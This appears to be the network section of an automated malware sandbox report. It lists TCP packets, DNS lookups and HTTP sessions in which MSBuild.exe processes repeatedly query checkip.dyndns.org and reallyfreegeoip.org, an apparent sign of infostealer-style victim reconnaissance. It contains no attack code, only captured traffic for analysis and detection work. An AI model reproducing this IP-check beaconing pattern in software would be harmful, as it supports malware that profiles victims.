                                              Nov 6, 2024 17:03:50.177429914 CET50258443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.178852081 CET4435025813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.178921938 CET4435025813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.178924084 CET50258443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.178970098 CET50258443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.179018974 CET50258443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.179030895 CET4435025813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.179052114 CET50258443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.179056883 CET4435025813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.181803942 CET50264443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.181859970 CET4435026413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.181962013 CET50264443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.182102919 CET50264443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.182116985 CET4435026413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.626353979 CET4435026013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.626832962 CET50260443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.626864910 CET4435026013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.627306938 CET50260443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.627322912 CET4435026013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.818912983 CET4435026113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.820600986 CET50261443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.820636034 CET4435026113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.821047068 CET50261443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.821053982 CET4435026113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.880773067 CET4435026013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.880805016 CET4435026013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.880824089 CET4435026013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.881009102 CET50260443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.881069899 CET4435026013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.881166935 CET50260443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.903830051 CET4435026313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.904252052 CET50263443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.904283047 CET4435026313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.904723883 CET50263443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.904730082 CET4435026313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.929116964 CET4435026413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.929527998 CET50264443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.929554939 CET4435026413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.930155039 CET50264443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.930160046 CET4435026413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.998368025 CET4435026013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.998404026 CET4435026013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.998450041 CET4435026013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.998471022 CET50260443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.998517990 CET50260443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.998672009 CET50260443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.998698950 CET4435026013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:50.998713970 CET50260443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:50.998719931 CET4435026013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.001715899 CET50265443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.001745939 CET4435026513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.001821995 CET50265443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.001981974 CET50265443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.001996994 CET4435026513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.013169050 CET4435026113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.013200045 CET4435026113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.013258934 CET4435026113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.013257027 CET50261443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.013299942 CET50261443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.013465881 CET50261443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.013483047 CET4435026113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.013516903 CET50261443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.013523102 CET4435026113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.015547037 CET50266443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.015582085 CET4435026613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.015645981 CET50266443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.015789032 CET50266443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.015801907 CET4435026613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.036948919 CET4435026313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.037013054 CET4435026313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.037065983 CET50263443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.037190914 CET50263443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.037204981 CET4435026313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.037216902 CET50263443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.037221909 CET4435026313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.039222956 CET50267443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.039242983 CET4435026713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.039329052 CET50267443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.039463997 CET50267443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.039477110 CET4435026713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.071799994 CET4435026413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.071861982 CET4435026413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.071912050 CET50264443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.072036982 CET50264443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.072056055 CET4435026413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.072067022 CET50264443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.072072983 CET4435026413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.074381113 CET50268443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.074417114 CET4435026813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.074470997 CET50268443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.074620008 CET50268443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.074635029 CET4435026813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.737776995 CET4435026513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.738290071 CET50265443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.738305092 CET4435026513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.738780022 CET50265443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.738786936 CET4435026513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.756989002 CET4435026613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.757333994 CET50266443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.757348061 CET4435026613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.757734060 CET50266443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.757740974 CET4435026613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.815977097 CET4435026713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.816515923 CET50267443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.816541910 CET4435026713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.816989899 CET50267443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.817001104 CET4435026713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.828869104 CET4435026813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.829147100 CET50268443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.829165936 CET4435026813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.829530954 CET50268443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.829540968 CET4435026813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.869617939 CET4435026513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.873370886 CET4435026513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.873460054 CET50265443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.876159906 CET50265443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.876179934 CET4435026513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.876202106 CET50265443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.876208067 CET4435026513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.879224062 CET50269443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.879268885 CET4435026913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.879355907 CET50269443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.879471064 CET50269443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.879487038 CET4435026913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.895457029 CET4435026613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.895519972 CET4435026613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.895570040 CET50266443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.895735979 CET50266443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.895752907 CET4435026613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.895762920 CET50266443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.895767927 CET4435026613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.898056984 CET50270443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.898091078 CET4435027013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.898161888 CET50270443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.898310900 CET50270443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.898324966 CET4435027013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.965779066 CET4435026713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.965811968 CET4435026713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.965857983 CET4435026713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.965892076 CET50267443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.965925932 CET50267443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.966104031 CET50267443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.966125965 CET4435026713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.966140032 CET50267443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.966145039 CET4435026713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.968493938 CET50271443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.968547106 CET4435027113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.968632936 CET50271443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.968774080 CET50271443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.968790054 CET4435027113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.992225885 CET4435026813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.992628098 CET4435026813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.992686987 CET50268443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.992721081 CET50268443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.992733002 CET4435026813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:51.992743969 CET50268443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:51.992748976 CET4435026813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:52.661667109 CET4435027013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:52.662271023 CET50270443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:52.662293911 CET4435027013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:52.662815094 CET50270443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:52.662818909 CET4435027013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:52.725635052 CET4435027113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:52.726109028 CET50271443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:52.726140022 CET4435027113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:52.726551056 CET50271443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:52.726556063 CET4435027113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:52.795736074 CET4435027013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:52.795816898 CET4435027013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:52.795866966 CET50270443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:52.796058893 CET50270443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:52.796072006 CET4435027013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:52.796082020 CET50270443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:52.796087027 CET4435027013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:52.857033014 CET4435027113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:52.857384920 CET4435027113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:52.857460976 CET50271443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:52.857500076 CET50271443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:52.857522011 CET4435027113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:52.857539892 CET50271443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:52.857544899 CET4435027113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:04:00.798232079 CET8056897193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:04:00.798304081 CET5689780192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:04:06.367171049 CET5679580192.168.2.62.16.100.168
                                              Nov 6, 2024 17:04:06.367506027 CET56793443192.168.2.640.126.31.73
                                              Nov 6, 2024 17:04:06.373258114 CET80567952.16.100.168192.168.2.6
                                              Nov 6, 2024 17:04:06.373303890 CET5679580192.168.2.62.16.100.168
                                              Nov 6, 2024 17:04:06.373689890 CET4435679340.126.31.73192.168.2.6
                                              Nov 6, 2024 17:04:06.373734951 CET56793443192.168.2.640.126.31.73
                                              Nov 6, 2024 17:04:07.488349915 CET4435026913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:04:07.488938093 CET50269443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:04:07.488965034 CET4435026913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:04:07.489419937 CET50269443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:04:07.489427090 CET4435026913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:04:09.412463903 CET4435026913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:04:09.412570953 CET4435026913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:04:09.412621021 CET50269443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:04:09.412929058 CET50269443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:04:09.412929058 CET50269443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:04:09.412950993 CET4435026913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:04:09.412960052 CET4435026913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:04:09.867744923 CET56798443192.168.2.640.126.31.73
                                              Nov 6, 2024 17:04:09.873177052 CET4435679840.126.31.73192.168.2.6
                                              Nov 6, 2024 17:04:09.873296976 CET56798443192.168.2.640.126.31.73
                                              Nov 6, 2024 17:04:10.554351091 CET50262443192.168.2.613.107.246.45
                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 6, 2024 17:02:41.924393892 CET5149553192.168.2.61.1.1.1
                                              Nov 6, 2024 17:02:42.181488037 CET53514951.1.1.1192.168.2.6
                                              Nov 6, 2024 17:02:44.274158001 CET6256053192.168.2.61.1.1.1
                                              Nov 6, 2024 17:02:44.282915115 CET53625601.1.1.1192.168.2.6
                                              Nov 6, 2024 17:03:01.481378078 CET5364350162.159.36.2192.168.2.6
                                              Nov 6, 2024 17:03:02.369319916 CET6046953192.168.2.61.1.1.1
                                              Nov 6, 2024 17:03:02.377573013 CET53604691.1.1.1192.168.2.6
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Nov 6, 2024 17:02:41.924393892 CET192.168.2.61.1.1.10x7dcStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Nov 6, 2024 17:02:44.274158001 CET192.168.2.61.1.1.10x3795Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Nov 6, 2024 17:03:02.369319916 CET192.168.2.61.1.1.10xe120Standard query (0)241.42.69.40.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Nov 6, 2024 17:02:38.557161093 CET1.1.1.1192.168.2.60xb65cNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                              Nov 6, 2024 17:02:38.557161093 CET1.1.1.1192.168.2.60xb65cNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                              Nov 6, 2024 17:02:42.181488037 CET1.1.1.1192.168.2.60x7dcNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Nov 6, 2024 17:02:42.181488037 CET1.1.1.1192.168.2.60x7dcNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Nov 6, 2024 17:02:42.181488037 CET1.1.1.1192.168.2.60x7dcNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Nov 6, 2024 17:02:42.181488037 CET1.1.1.1192.168.2.60x7dcNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Nov 6, 2024 17:02:42.181488037 CET1.1.1.1192.168.2.60x7dcNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Nov 6, 2024 17:02:42.181488037 CET1.1.1.1192.168.2.60x7dcNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Nov 6, 2024 17:02:44.282915115 CET1.1.1.1192.168.2.60x3795No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Nov 6, 2024 17:02:44.282915115 CET1.1.1.1192.168.2.60x3795No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Nov 6, 2024 17:02:47.751630068 CET1.1.1.1192.168.2.60xc99aNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                              Nov 6, 2024 17:02:47.751630068 CET1.1.1.1192.168.2.60xc99aNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                              Nov 6, 2024 17:02:49.553936958 CET1.1.1.1192.168.2.60x7e64No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                              Nov 6, 2024 17:02:49.553936958 CET1.1.1.1192.168.2.60x7e64No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                              Nov 6, 2024 17:03:02.377573013 CET1.1.1.1192.168.2.60xe120Name error (3)241.42.69.40.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                              • reallyfreegeoip.org
                                              • checkip.dyndns.org
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.656815193.122.6.168807200C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 6, 2024 17:02:42.207334042 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Nov 6, 2024 17:02:43.380105019 CET323INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:42 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: ee22f5c5a4509e704d9e98a37bff2684
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>
                                              Nov 6, 2024 17:02:43.381920099 CET323INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:42 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: ee22f5c5a4509e704d9e98a37bff2684
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>
                                              Nov 6, 2024 17:02:43.942051888 CET127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Nov 6, 2024 17:02:44.188885927 CET323INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:44 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: f642a1792df5a9bd4ac07b06c3828a2a
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>
                                              Nov 6, 2024 17:02:45.168216944 CET127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Nov 6, 2024 17:02:45.417886972 CET323INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:45 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 0674c2659ef48dee9346163ff314a0cf
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.656841193.122.6.168807200C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 6, 2024 17:02:46.313200951 CET127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Nov 6, 2024 17:02:47.142118931 CET323INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:47 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 811af6d69f83974f60d7d04fa074bc52
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.656843193.122.6.168807636C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                              TimestampBytes transferredDirectionData
                                              Nov 6, 2024 17:02:46.933151960 CET151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Nov 6, 2024 17:02:47.779933929 CET323INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:47 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: c32b07aa18a295c2c720a0ee0328b327
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.80</body></html>
                                              Nov 6, 2024 17:02:47.783888102 CET127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Nov 6, 2024 17:02:48.030507088 CET323INHTTP/1.1 200 OK
                                              Date: Wed, 06 Nov 2024 16:02:47 GMT
                                              Content-Type: text/html
                                              Content-Length: 106
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 818008912c3b33266152162f77761a29
